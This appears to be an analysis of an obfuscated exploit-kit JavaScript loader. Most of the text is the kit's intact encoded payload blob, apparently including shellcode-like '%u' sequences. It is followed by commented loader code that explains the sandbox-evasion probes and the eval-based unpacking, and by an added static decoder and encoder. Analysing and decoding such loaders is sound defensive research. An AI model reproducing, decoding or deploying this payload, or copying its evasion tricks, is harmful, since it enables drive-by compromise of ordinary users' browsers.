cw#ti#w#yy#cq#ie#ie#ie#to#yy#ue#to#iq#yp#yo#uw#cw#yw#qo#u#qq#qu#yw#wp#i#qu#yw#e#e#cq#iq#tu#qo#yq#r#yq#to#ur#we#ry#eu#cw#yr#r#up#uw#yo#yq#eq#wy#q#ci#r#ci#q#yw#cq#qu#ye#yp#cw#tu#cq#iq#tt#qo#yw#r#ur#yo#rq#ur#uw#ye#yi#yq#cw#cq#qu#ty#uw#to#tt#yt#ie#ie#ye#yp#cw#co#tu#cq#iq#tu#qo#yq#r#yq#to#ur#we#ry#eu#cw#yr#r#up#uw#yo#yq#eq#wy#cq#ie#ye#yp#cw#tt#qo#qo#ci#qw#ci#cq#iq#ur#uw#uo#iq#tu#r#we#yy#yy#yo#uu#rq#tu#uw#ye#up#ur#we#tu#tu#to#ue#ue#qo#ci#tt#yy#uu#tt#uo#ue#ci#ie#tu#tt#ur#tu#yw#cw#yt#cq#iq#uw#to#ur#ut#uw#yi#ci#qw#w#y#w#i#u#w#y#ci#ie#ie#ur#uw#uo#iq#yy#qo#ty#cw#tu#r#wo#to#ur#rr#tt#uw#ye#tt#ty#yy#to#cw#ci#cy#uy#to#uw#ue#ye#yo#yi#ci#cq#cq#ie#tu#tt#ur#tu#yw#cw#yt#cq#iq#ie#ye#yp#cw#co#yy#cr#cr#tt#cq#iq#yy#qo#tt#ie#ie#yr#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yy#wq#u#qy#e#u#qu#yr#r#uy#to#uw#ue#ye#yo#yi#qo#yq#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#yy#cq#qu#uw#to#ur#ut#uw#yi#cqp#ur#uw#ut#to#ie#ie#w#tt#ti#yo#ty#to#uw#to#tt#ti#to#uw#qy#iq#yu#ye#yu#to#rw#uo#up#to#qy#ci#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#up#ti#yp#ci#w#yi#tt#uy#ei#yy#ut#yq#ye#yi#eu#ty#yr#qy#yi#ut#yy#yy#w#up#uw#yo#yq#eq#wy#qy#ro#ci#we#tu#uw#yo#ei#wy#wi#r#ei#wy#wi#ci#w#ci#ei#wy#wi#r#ei#ti#yp#wt#ur#uw#yy#ci#tq#w#tu#yy#tt#ue#ue#eq#wy#qy#ci#tu#yy#ue#ye#ti#qy#wt#we#qr#we#qt#qe#qr#y#e#i#qr#y#wy#e#u#u#wt#wi#e#we#i#qp#wy#e#qp#qp#qp#qq#qq#o#qq#qp#y#y#y#y#ci#w#eq#ey#rq#rw#we#er#er#wu#wy#qy#iq#ie#w#up#yy#ut#yq#ye#yi#ep#tt#ue#et#ye#yu#to#rw#uo#up#to#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ti#w#tu#w#yp#cq#iq#uy#tt#uw#cqp#ty#qo#ur#yw#ye#ue#w#to#qo#ty#r#cy#w#tt#qu#yp#yo#uw#cw#tt#cqp#ye#yi#cqp#ti#cq#iq#ye#yp#cw#ti#ro#tt#tq#cr#cr#ti#ro#tt#tq#r#ur#uo#up#to#cr#cr#ti#ro#tt#tq#r#ur#uo#up#to#qo#qo#tu#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#ie#ye#yp#cw#to#r#yq#to#ur#et#ye#yu#to#wu#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#cw#tu#w#yp#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#uw#to#ur#ut#uw#yi#cqp#y#ie#w#yq#to#ur#rr#to#uw#ue#ye#yo#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yy#w#yr#cq#iq#uy#tt#uw#cqp#yq#qo#ur#yw#ye#ue#w#ti#qo#yq#r#cy#w#ye#w#yp#w#yu#w#yi#w#ty#qo#yi#ut#yy#yy#w#yw#qo#yi#ut#yy#yy#w#yt#q
o#yq#r#yu#ye#yu#to#rw#uo#up#to#w#tt#w#tu#qu#ye#yp#cw#ti#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#yr#cq#cq#iq#yr#qo#yr#r#uw#to#up#yy#tt#tu#to#cw#t#tp#ue#t#yq#w#ci#ci#cq#qu#ye#yp#cw#yr#cq#iq#yt#qo#yr#ie#ie#to#yy#ue#to#iq#yr#qo#yi#ut#yy#yy#ie#ye#yp#cw#ti#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#yq#r#eq#ey#rq#rw#we#er#er#wu#wy#ro#yt#tq#cq#cq#iq#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yq#r#eq#ey#rq#rw#we#er#er#wu#wy#ro#yt#tq#qu#uw#to#ur#ut#uw#yi#ie#ye#yp#cw#co#ti#r#ye#ue#eq#wu#cq#iq#tt#qo#ci#we#ti#yo#ty#to#r#p#ei#wy#wi#r#p#ei#yy#ut#yq#e#wq#ye#yi#iw#we#ti#yo#ty#to#r#p#we#tu#uw#yo#ty#tt#ur#r#p#ei#yy#ut#yq#e#wq#ye#yi#iw#we#ti#yo#ty#to#r#p#rp#to#tt#ti#to#uw#r#p#ei#yy#ut#yq#e#wq#ye#yi#ci#qu#ye#yp#cw#yq#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#co#qo#qo#y#cq#iq#yq#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#qo#y#qu#ty#qo#ti#r#yq#to#ur#et#ye#yu#to#wu#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#cw#yq#r#yu#ye#yu#to#rw#uo#up#to#w#tt#cq#qu#ye#yp#cw#co#yr#cq#iq#yi#qo#ty#ie#ye#yp#cw#co#ty#cr#cr#ti#r#yw#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#yq#r#yu#ye#yu#to#rw#uo#up#to#cq#cq#iq#ty#qo#ti#r#yp#ye#yi#ti#ey#tt#uy#ei#yy#ut#yq#ye#yi#cw#tt#w#y#cq#ie#ye#yp#cw#ty#cq#iq#yq#r#yi#tt#uy#ei#yy#ut#yq#ye#yi#eu#ty#yr#qo#ty#qu#yw#qo#ti#r#yq#to#ur#ey#ut#yu#cw#ty#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#cq#iw#iw#ti#r#yq#to#ur#ey#ut#yu#cw#ty#r#yi#tt#yu#to#cq#qu#yw#qo#ti#r#yq#to#ur#ei#yy#ut#yq#ye#yi#wi#ye#yy#to#rr#to#uw#ue#ye#yo#yi#cw#ty#w#yw#cq#qu#ye#yp#cw#co#yw#cr#cr#ti#r#eu#rq#qo#qo#u#cq#iq#ye#yp#cw#yq#r#up#yy#ut#yq#ye#yi#ep#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#ty#w#ci#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#uy#yi#ti#r#tt#ti#yo#ty#to#r#up#ti#yp#ui#yu#yy#ci#w#tt#cq#cq#iq#yw#qo#ci#qt#ci#ie#to#yy#ue#to#iq#ye#yp#cw#yq#r#up#yy#ut#yq#ye#yi#ep#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#ty#w#ci#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#uy#yi#ti#r#tt#ti#yo#ty#to#r#ui#e#yu#tt#uw#ue#ci#w#tt#cq#cq#iq#yw#qo#ci#qr#ci#ie#ie#ie#ie#ie#to#yy#ue#to#iq#yw#qo#yq#r#uy#to#uw#ue#ye#yo#yi#ie#ye#yp#cw#co#ti#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#yi#cq#cq#iq#yi#qo#ti#r#yq#to#ur#et#ye#yu#to#wu#yi#tt#ty#yy
#to#ti#ei#yy#ut#yq#ye#yi#cw#yt#w#tt#cq#ie#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yi#cr#cr#yw#wq#u#qy#cw#yi#wq#y#qy#cw#yq#r#yi#tt#uy#ei#yy#ut#yq#ye#yi#eu#ty#yr#wq#e#y#r#i#qy#e#u#cq#cq#ie#to#yy#ue#to#iq#ty#qo#ti#r#yq#to#ur#we#ry#eu#cw#yq#r#up#uw#yo#yq#eq#wy#ro#y#tq#cq#iw#iw#ti#r#yq#to#ur#we#ry#eu#cw#yq#r#up#uw#yo#yq#eq#wy#ro#u#tq#cq#qu#tu#qo#t#qo#tp#ue#p#cw#ro#tp#ti#tp#r#tq#q#cq#t#yq#qu#ur#uw#uo#iq#yp#qo#cw#ty#iw#iw#ti#r#yq#to#ur#wy#eu#et#yo#ty#yr#cw#ti#r#ye#yi#ue#to#uw#ur#ep#rw#et#er#cw#ci#yo#ty#yr#to#tu#ur#ci#w#ro#ci#tu#yy#tt#ue#ue#ye#ti#ci#w#yq#r#tu#yy#tt#ue#ue#eq#wy#tq#w#ro#ci#ue#uw#tu#ci#w#ci#ci#tq#w#ci#ci#w#yq#cq#cq#cq#r#wo#to#ur#rr#to#uw#ue#ye#yo#yi#ue#cw#cq#qu#yp#yo#uw#cw#yu#qo#y#qu#yu#qi#qq#qu#yu#q#q#cq#iq#ye#yp#cw#tu#r#ur#to#ue#ur#cw#yp#cq#cr#cr#cw#co#yw#iw#iw#rp#to#yq#wu#ui#up#r#cy#u#wp#yw#cq#cq#iq#yw#qo#rp#to#yq#wu#ui#up#r#cy#u#ie#ie#ie#tu#tt#ur#tu#yw#cw#ye#cq#iq#ie#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yw#wq#u#qy#cw#ty#wq#y#qy#e#u#cq#ie#ye#yp#cw#co#yq#r#uy#to#uw#ue#ye#yo#yi#cq#iq#yq#r#uy#to#uw#ue#ye#yo#yi#qo#ti#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#yw#cq#ie#yq#r#eq#ey#rq#rw#we#er#er#wu#wy#ro#yt#tq#qo#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#ie#ie#w#ip#ip#qy#y#ie#qu#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#ye#yi#ye#ur#rq#tu#uw#ye#up#ur#cw#cq#qu#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#ci#r#ci#cq#qu#up#ti#yp#uy#to#uw#qo#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#ci#we#ti#yo#ty#to#rp#to#tt#ti#to#uw#ci#cq#qu#yp#yy#tt#ue#yw#uy#to#uw#qo#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#ce#wi#yy#tt#ue#yw#ce#cq#qu#ie#tu#tt#ur#tu#yw#cw#to#cq#iq#ie#ye#yp#cw#ur#uo#up#to#yo#yp#cqp#up#ti#yp#uy#to#uw#qo#qo#ce#ue#ur#uw#ye#yi#yq#ce#cq#iq#up#ti#yp#uy#to#uw#qo#up#ti#yp#uy#to#uw#r#ue#up#yy#ye#ur#cw#ce#r#ce#cq#ie#to#yy#ue#to#iq#up#ti#yp#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#ie#ye#yp#cw#ur#uo#up#to#yo#yp#cqp#yp#yy#tt#ue#yw#uy#to#uw#qo#qo#ce#ue#ur#uw#ye#yi#yq#ce#cq#iq#yp#yy#tt#ue#yw#uy#to#uw#qo#yp#yy#tt#ue#yw#uy#to#uw#r#ue#up#yy#
ye#ur#cw#ce#r#ce#cq#ie#to#yy#ue#to#iq#yp#yy#tt#ue#yw#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#ie#qu#to#ui#to#tu#qe#qo#u#qu#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#y#cw#cq#iq#ue#up#yy#i#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#i#cw#cq#iq#ue#up#yy#o#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#o#cw#cq#iq#ue#up#yy#qp#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#qp#cw#cq#iq#ue#up#yy#qq#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#wt#ey#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#ce#tu#yo#yi#ur#to#yi#ur#t#ue#tu#yo#uw#to#r#ue#uu#yp#ce#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#wr#yy#yo#tu#yt#rq#ye#ip#to#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#y#i#qp#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#we#yy#yy#yo#tu#rq#ye#ip#to#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#y#i#qp#cqp#p#cqp#u#y#i#qp#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#we#yy#yy#yo#tu#wt#yo#ut#yi#ur#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#o#y#y#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#wi#ye#yy#yy#wr#uo#ur#to#ue#cw#cq#iq#uy#tt#uw#cqp#tt#qo#ce#ct#ut#ce#q#ce#y#tu#y#tu#ce#qu#uw#to#ur#ut#uw#yi#cqp#tt#q#tt#qu#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#rq#yw#to#yy#yy#wt#yo#ti#to#cw#cq#iq#ye#yp#cw#u#cq#iq#uw#to#ur#ut#uw#yi#cqp#ci#ct#ut#qp#u#qp#u#ct#ut#qp#u#qp#u#ct#ut#qr#o#qw#qw#ct#ut#yp#tu#to#qp#ct#ut#to#ty#yp#tu#ct#ut#qq#qr#u#y#ct#ut#tu#qt#o#u#ct#ut#qr#u#qw#qw#ct#ut#qq#qp#to#qt#ct#ut#qr#y#yp#to#ct#ut#i#qr#o#y#ct#ut#to#i#qp#y#ct#ut#to#ty#yp#tt#ct#ut#to#qr#y#qq#ct#ut#yp#yp#to#ty#ct#ut#yp#yp#yp#yp#ct#ut#tu#tu#tt#ti#ct#ut#u#tu#qq#ti#ct#ut#qe#qe#tu#u#ct#ut#to#qr#u#ty#ct#ut#tt#o#qp#tu#ct#ut#u#qr#qw#qr#ct#ut#qw#qr#tt#o#ct#ut#tt#o#i#qp#ct#ut#o#qp#qq#qr#ct#ut#tt#o#qe#to#ct#ut#i#y#qq#to#ct#ut#yp#o#u#ty#ct#ut#tt#o#qp#to#ct#ut#u#qp#qe#qw#ct#ut#qq#tu#i#ty#ct#ut#y#qp#u#ty#ct#ut#tu#qw#tt#qt#ct#ut#o#qr#o#ti#ct#ut#ti#qe#ti#qe#ct#ut#tt#o#qt#y#ct#ut#u#qr#qw#qr#ct#ut#qw#to#to#ty#ct#ut#i#to#u#u#ct#ut#ti#o#qq#ti#ct#ut#u#tu#tt#yp#ct#ut#tt#ti#y#tu#ct#ut#qq#ti#tu#tu#ct#ut#tu#u#qe#qt#ct#ut#qw#qp#tu#o#ct#ut#qe#to#qe#qt#ct#ut#qq#ti#tt#o#ct#ut#tt#o#u#qp#ct#ut#u#ti#qq#tu#ct#ut#i#ty#qq#y#ct#ut#qe#to#ti#ti#
ct#ut#qq#to#tt#o#ct#ut#i#ty#y#qr#ct#ut#u#ty#ti#ti#ct#ut#qw#u#to#u#ct#ut#ti#qp#qw#qt#ct#ut#i#ty#qr#qq#ct#ut#u#ty#to#ti#ct#ut#i#qe#yp#o#ct#ut#o#qr#qt#qw#ct#ut#ti#tt#u#y#ct#ut#i#y#qq#tu#ct#ut#to#o#to#qt#ct#ut#i#ty#i#qq#ct#ut#qw#qr#yp#i#ct#ut#ti#qt#tu#o#ct#ut#o#qe#u#o#ct#ut#tu#to#qq#ti#ct#ut#tt#o#qe#qw#ct#ut#y#tu#qe#qw#ct#ut#yp#qq#i#ty#ct#ut#tt#o#qp#to#ct#ut#qw#o#i#qp#ct#ut#qw#to#tt#qq#ct#ut#ti#qe#tu#qp#ct#ut#y#tu#qe#tu#ct#ut#tt#o#i#qp#ct#ut#i#ty#yp#y#ct#ut#tt#o#yp#qq#ct#ut#tt#o#i#tu#ct#ut#to#ti#i#ty#ct#ut#qe#qw#qr#o#ct#ut#to#ty#qe#u#ct#ut#qe#ty#tu#o#ct#ut#tt#o#qr#qq#ct#ut#y#qr#qp#y#ct#ut#qq#qq#tt#qr#ct#ut#u#ty#i#qp#ct#ut#i#ty#qq#tu#ct#ut#tu#o#ty#to#ct#ut#tt#o#ti#ty#ct#ut#i#y#qp#y#ct#ut#ti#yp#tt#o#ct#ut#i#ti#qp#i#ct#ut#tu#y#qe#u#ct#ut#ti#qe#ty#y#ct#ut#ti#qe#ti#qe#ct#ut#ti#u#tu#tt#ct#ut#i#qr#tu#y#ct#ut#i#qr#i#qr#ct#ut#qe#y#i#qr#ct#ut#qp#i#qe#qr#ct#ut#qp#y#qw#qr#ct#ut#i#qr#ti#qe#ct#ut#i#qr#i#qr#ct#ut#tt#ty#qe#qr#ct#ut#o#u#to#qr#ct#ut#qe#ti#qe#qr#ct#ut#tu#qp#tt#o#ct#ut#qe#qw#tt#o#ct#ut#tt#ty#o#qr#ct#ut#i#ti#to#ty#ct#ut#tu#ty#ti#qe#ct#ut#qp#qe#qp#y#ct#ut#i#qr#qp#qw#ct#ut#qp#y#i#qr#ct#ut#qq#tt#qq#ti#ct#ut#qp#qq#qp#qp#ct#ut#ti#qe#qe#tu#ct#ut#tt#ty#o#to#ct#ut#i#y#to#tu#ct#ut#tu#y#tt#o#ct#ut#qp#qt#tu#y#ct#ut#ti#qe#ti#qe#ct#ut#tu#o#ti#qe#ct#ut#tu#o#i#tt#ct#ut#tt#qt#qq#tt#ct#ut#i#tu#tu#qp#ct#ut#i#qr#i#qt#ct#ut#tt#qq#i#qr#ct#ut#y#tu#qe#qp#ct#ut#to#yp#i#qp#ct#ut#y#tu#i#tu#ct#ut#qp#ti#qq#tt#ct#ut#qq#ty#qp#yp#ct#ut#qw#tu#to#yp#ct#ut#i#tu#y#tu#ct#ut#qq#tt#qq#to#ct#ut#u#tt#u#ty#ct#ut#qw#tu#to#yp#ct#ut#i#y#y#tu#ct#ut#y#qq#y#qr#ct#ut#y#qr#qq#ty#ct#ut#qp#y#qe#ty#ct#ut#i#qr#ti#y#ct#ut#i#qr#i#qr#ct#ut#qe#to#ti#qe#ct#ut#tt#o#i#qp#ct#ut#u#ty#tu#y#ct#ut#qe#qt#to#u#ct#ut#qw#tu#to#yp#ct#ut#i#qr#o#qq#ct#ut#qq#qr#qq#yp#ct#ut#qq#tu#qp#tt#ct#ut#qw#tu#to#yp#ct#ut#i#ti#o#qq#ct#ut#qp#tu#y#qw#ct#ut#qp#qp#qp#qp#ct#ut#qw#tu#to#to#ct#ut#i#u#o#qq#ct#ut#qe#u#i#qr#ct#ut#to#qt#tt#i#ct#ut#u#qr#i#tu#ct#ut#qw#tu#tt#y#ct#ut#i#tu#o#qq#ct#ut#qe#qt#qw#qt#ct#ut#i#qr#qp#i#ct#ut#i#qr#qp#i#ct#ut#qe#yp#qe#ty#ct#ut#i#qr#qp
#i#ct#ut#qe#to#ti#qe#ct#ut#tt#ti#o#tu#ct#ut#qq#ti#to#qr#ct#ut#qp#i#o#to#ct#ut#qe#ty#i#qr#ct#ut#qe#to#ti#qe#ct#ut#qp#i#i#tu#ct#ut#tt#ty#i#qr#ct#ut#i#qp#tu#o#ct#ut#ti#qe#qe#ty#ct#ut#i#tu#qe#to#ct#ut#to#ty#tt#ty#ct#ut#tu#o#i#qp#ct#ut#tu#o#i#tt#ct#ut#qw#yp#o#ty#ct#ut#u#qe#tt#qr#ct#ut#qq#ti#i#qr#ct#ut#qw#yp#ti#i#ct#ut#u#qe#tt#qr#ct#ut#qq#ti#i#qr#ct#ut#qp#i#to#tu#ct#ut#qp#i#i#qr#ct#ut#ti#qe#ti#qw#ct#ut#i#y#qe#to#ct#ut#ty#qp#tu#y#ct#ut#ti#qe#ti#qw#ct#ut#tt#qw#ti#qe#ct#ut#i#qw#qw#qw#ct#ut#ty#y#tu#qp#ct#ut#tt#i#ti#qw#ct#ut#tt#u#i#qw#ct#ut#i#qt#qp#qe#ct#ut#u#ty#qt#qq#ct#ut#tt#i#to#i#ct#ut#o#o#qe#o#ct#ut#qw#to#to#to#ct#ut#u#to#qq#u#ct#ut#y#qe#o#i#ct#ut#qp#y#qq#qr#ct#ut#qq#tu#qq#tu#ct#ut#u#i#qq#qr#ct#ut#y#qe#y#qe#ct#ut#qq#yp#qq#tu#ct#ut#qq#ty#qp#u#ct#ut#qp#ti#qq#tu#ct#ut#qq#tu#qp#tu#ct#ut#qq#tt#qp#qt#ct#ut#qq#ty#qq#tu#ct#ut#qp#qw#y#qw#ct#ut#qq#tu#qp#ti#ct#ut#qq#yp#y#qe#ct#ut#qq#qr#y#qw#ct#ut#qq#qr#qp#y#ct#ut#qp#to#u#qe#ct#ut#u#qt#u#qq#ct#ut#u#ty#qp#tt#ct#ut#u#yp#u#ty#ct#ut#qp#ti#y#to#ct#ut#u#qt#u#qq#ct#ut#i#qr#i#qr#ci#qu#ie#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#qq#cw#cq#iq#uy#tt#uw#cqp#uy#to#uw#u#qo#yp#yy#tt#ue#yw#uy#to#uw#ro#y#tq#qu#uy#tt#uw#cqp#uy#to#uw#i#qo#yp#yy#tt#ue#yw#uy#to#uw#ro#u#tq#qu#uy#tt#uw#cqp#uy#to#uw#o#qo#yp#yy#tt#ue#yw#uy#to#uw#ro#i#tq#qu#ye#yp#cqp#cw#cw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qo#qo#y#cr#cr#uy#to#uw#o#wp#qp#y#cq#iw#iw#cw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#wp#y#cq#cr#cr#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qi#i#cq#cq#cq#iw#iw#cw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qo#qo#i#cr#cr#uy#to#uw#o#qi#u#qq#qt#cq#iw#iw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qi#i#cq#cq#cq#iq#uy#tt#uw#cqp#yp#yi#tt#yu#to#qo#ci#tu#yo#yi#ur#to#yi#ur#t#yp#ye#to#yy#ti#ci#qu#uy#tt#uw#cqp#wi#yy#tt#ue#yw#te#yo#ty#yr#qo#ci#qi#yo#ty#yr#to#tu#ur#cqp#tu#yy#tt#ue#ue#ye#ti#qo#ce#tu#yy#ue#ye#ti#qy#ti#i#qe#tu#ti#ty#qw#to#e#tt#to#qw#ti#e#u#u#tu#yp#e#qt#qw#ty#qr#e#qp#qp#qp#qq#qq#o#qq#qp#y#y#y#y#ce#cqp#uu#ye#ti#ur#yw#qo#u#y#cqp#yw#to#ye#yq#yw#ur#qo#u#y#cqp#ye#ti#qo#ce#ue#uu
#yp#te#ye#ti#ce#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#ce#yu#yo#uy#ye#to#ce#cqp#uy#tt#yy#ut#to#qo#ce#ci#q#yp#yi#tt#yu#to#q#ci#r#ue#uu#yp#ce#cqp#t#wp#ci#qu#tt#yy#qo#ci#tt#yy#uu#tt#uo#ue#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#tp#ci#tt#yy#yy#yo#uu#rq#tu#uw#ye#up#ur#we#tu#tu#to#ue#ue#tp#ci#cqp#uy#tt#yy#ut#to#qo#ce#ci#q#tt#yy#q#ci#ce#cqp#t#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#ce#ei#yy#tt#uo#ce#cqp#uy#tt#yy#ut#to#qo#ce#y#ce#cqp#t#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#to#yu#ty#to#ti#cqp#ue#uw#tu#qo#ce#ci#q#yp#yi#tt#yu#to#q#ci#r#ue#uu#yp#ce#cqp#ye#ti#qo#ce#ue#uu#yp#te#ye#ti#ce#cqp#yi#tt#yu#to#qo#ce#ue#uu#yp#te#ye#ti#ce#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#tt#yy#yy#yo#uu#rq#tu#uw#ye#up#ur#we#tu#tu#to#ue#ue#qo#ce#ci#q#tt#yy#q#ci#ce#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#ur#uo#up#to#qo#ce#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#ui#e#ue#yw#yo#tu#yt#uu#tt#uy#to#e#yp#yy#tt#ue#yw#ce#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#uu#ye#ti#ur#yw#qo#ce#u#y#ce#cqp#yw#to#ye#yq#yw#ur#qo#ce#u#y#ce#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#t#to#yu#ty#to#ti#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#t#yo#ty#yr#to#tu#ur#wp#ci#qu#uy#tt#uw#cqp#yo#rq#up#tt#yi#qo#ti#yo#tu#ut#yu#to#yi#ur#r#tu#uw#to#tt#ur#to#wu#yy#to#yu#to#yi#ur#cw#ci#ue#up#tt#yi#ci#cq#qu#ti#yo#tu#ut#yu#to#yi#ur#r#ty#yo#ti#uo#r#tt#up#up#to#yi#ti#wt#yw#ye#yy#ti#cw#yo#rq#up#tt#yi#cq#qu#yo#rq#up#tt#yi#r#ye#yi#yi#to#uw#ep#rw#et#er#qo#wi#yy#tt#ue#yw#te#yo#ty#yr#qu#ie#ue#to#ur#rw#ye#yu#to#yo#ut#ur#cw#to#yi#ti#te#uw#to#ti#ye#uw#to#tu#ur#w#qr#y#y#y#cq#qu#ie#ue#up#yy#y#cw#cq#qu";
// In browsers btoa is a native function without [[Construct]], so new btoa(12) throws and r becomes "replace".
// An engine that exposes btoa as an ordinary constructible function never enters the catch: r stays "r",
// a[r] is undefined and the loader dies without revealing anything. Same trick as the new window(123) probes.
try{new btoa(12);}catch(qqq){r+="eplace";}
// Substitution table: q w e r t y u i o p -> 1 2 3 4 5 6 7 8 9 0, and c -> "-" for negative offsets.
a=a[r](/q/g,"1");
a=a[r](/w/g,"2");
a=a[r](/e/g,"3");
a=a[r](/r/g,"4");
a=a[r](/t/g,"5");
a=a[r](/y/g,"6");
a=a[r](/u/g,"7");
a=a[r](/i/g,"8");
a=a[r](/o/g,"9");
a=a[r](/p/g,"0");
a=a[r](/c/g,"-");
}
a=a.split("#");        // one signed decimal offset per token
md='a';                // unused
c=[];                  // accumulator; [] + "x" coerces to the string "x"
i=0;
p=parseInt;            // unused
try{new window(123).typ;}catch(qqq){qq=String;}          // window is not a constructor, so this always throws: qq=String
try{new btoa(12);}catch(qqq){fr="ode";}                  // fr is only ever tested for truthiness below
try{new btoa(12);}catch(qqq){qq2=e("qq.fromCharCode");}  // String.fromCharCode fetched through eval (e), keeping the name out of the script text
if(aaa==aa){           // "1"=="1" in any real engine; aa and aaa come from the first try/catch above
while(15062>i){        // number of tokens in the blob
vv=a[i];
r2=cc=qq2(40+2+1*vv);  // character code = 42 + offset: "58" -> "d", "-10" -> " "
r=c;
if(fr)c=r+r2;
i=i+1;
}
w=e;
w(c);                  // eval the rebuilt script; its text is the deobfuscated code below
}
*/
</script></body></html> */
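/* Added example, not from the gist author or the kit: a static decoder for the string layer above, so the
   blob can be unpacked without ever calling eval. It reproduces the a[r](...) substitutions and the
   fromCharCode(42+token) loop, and adds the inverse so test vectors can be built. The sample token string
   below is constructed with that inverse; it is the encoding of document.write('<center>, which is what the
   decoded script opens with in the section that follows. */

```javascript
'use strict';

// Letter-to-digit table from the a[r](/q/g,"1") ... a[r](/c/g,"-") chain.
const SUBST = { q: '1', w: '2', e: '3', r: '4', t: '5', y: '6', u: '7', i: '8', o: '9', p: '0', c: '-' };
const BASE = 42; // the loop computes String.fromCharCode(40 + 2 + 1 * token)

// Decode one blob: substitute letters, split on '#', map each signed offset to a character.
function decodeTokenLayer(blob) {
  // Any character outside the table is left alone, so a malformed token surfaces
  // as an error below instead of silently vanishing.
  const digits = blob.replace(/[qwertyuiopc]/g, ch => SUBST[ch]);
  let out = '';
  for (const tok of digits.split('#')) {
    if (tok === '') continue;           // tolerate a trailing '#'
    const n = Number(tok);              // the kit uses 1*vv, the same coercion
    if (!Number.isInteger(n)) {
      throw new Error('bad token: ' + JSON.stringify(tok));
    }
    out += String.fromCharCode(BASE + n);
  }
  return out;
}

// Inverse of the above, for building test vectors; the kit ships no such thing.
function encodeTokenLayer(text) {
  const inv = {};
  for (const k of Object.keys(SUBST)) inv[SUBST[k]] = k;
  return Array.from(text, ch => String(ch.charCodeAt(0) - BASE))
    .map(num => num.replace(/[0-9-]/g, d => inv[d]))
    .join('#');
}

// Constructed sample: encodeTokenLayer("document.write('<center>"). Tokens starting
// with 'c' are negative offsets and cover characters below '*' (0x2A).
const SAMPLE = 'ti#yo#tu#ut#yu#to#yi#ur#r#uu#uw#ye#ur#to#cw#ce#qi#tu#to#yi#ur#to#uw#wp';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(decodeTokenLayer(SAMPLE));
}
```

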